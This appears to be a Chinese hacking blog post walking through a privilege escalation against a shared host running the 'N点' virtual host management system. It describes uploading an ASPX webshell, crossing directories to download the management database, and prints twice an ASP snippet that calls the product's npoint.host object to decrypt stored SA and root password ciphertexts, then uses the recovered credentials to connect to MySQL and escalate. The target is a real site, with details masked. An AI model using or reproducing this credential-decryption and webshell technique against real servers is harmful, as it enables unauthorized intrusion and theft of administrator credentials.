N点虚拟机管理系统提权实例

N点虚拟机管理系统提权实例…为保留被检测网址的隐私局部会有马赛克嘻嘻
目标方该虚拟主机支持

ASP、。NET、PHP

传个ASPX大马，能列IIS

找了找，分配的权限不是很死，还能跨目录，发现虚拟机的管理目录

N点虚拟机，翻了翻目录里的东西，找到了他的数据库。下载看了看，帐号密码加密的


有SA有ROOT，就是加密的。

<!&ndash;#includefile=&rdquo;conn.asp&rdquo;&ndash;>

<!&ndash;#includefile=&rdquo;siteinfo.asp&rdquo;&ndash;>

<!&ndash;#includefile=&rdquo;char.asp&rdquo;&ndash;>

<%

setiishost=server.CreateObject(&ldquo;npoint.host&rdquo;)

x=iishost.Eduserpassword(&ldquo;RNTYQ@DLLDDNEKFLK@EKHHMCGBFCDDFEBKFNDM@MHKBIJIPDMJ@B&rdquo;,0)

response.writex

%>

我想你们都能看得懂，不过必须放在程序的目录下。但没写入权限，也只能自己去下载一套程序。

然后安装把文件放在INC目录下。inc/111.asp

先把密文替换

<!&ndash;#includefile=&rdquo;conn.asp&rdquo;&ndash;>

<!&ndash;#includefile=&rdquo;siteinfo.asp&rdquo;&ndash;>

<!&ndash;#includefile=&rdquo;char.asp&rdquo;&ndash;>

<%

setiishost=server.CreateObject(&ldquo;npoint.host&rdquo;)

x=iishost.Eduserpassword(&ldquo;LJDNI@OFHMOCBFKEAAINJOADHMNEKIODCHMONHMI@E&ldquo;,0)

response.writex

%>
然后进行本机的N点虚拟机WEB目录访问http://127.0.0.1:8080/inc/111.asp

明文很成功的解出来了。

既然明文解出来了，我们去连接看看该文明是MYSQL，放个大马连接

成功连接，提权的大家都熟悉了吧！呵呵文章到此结束
*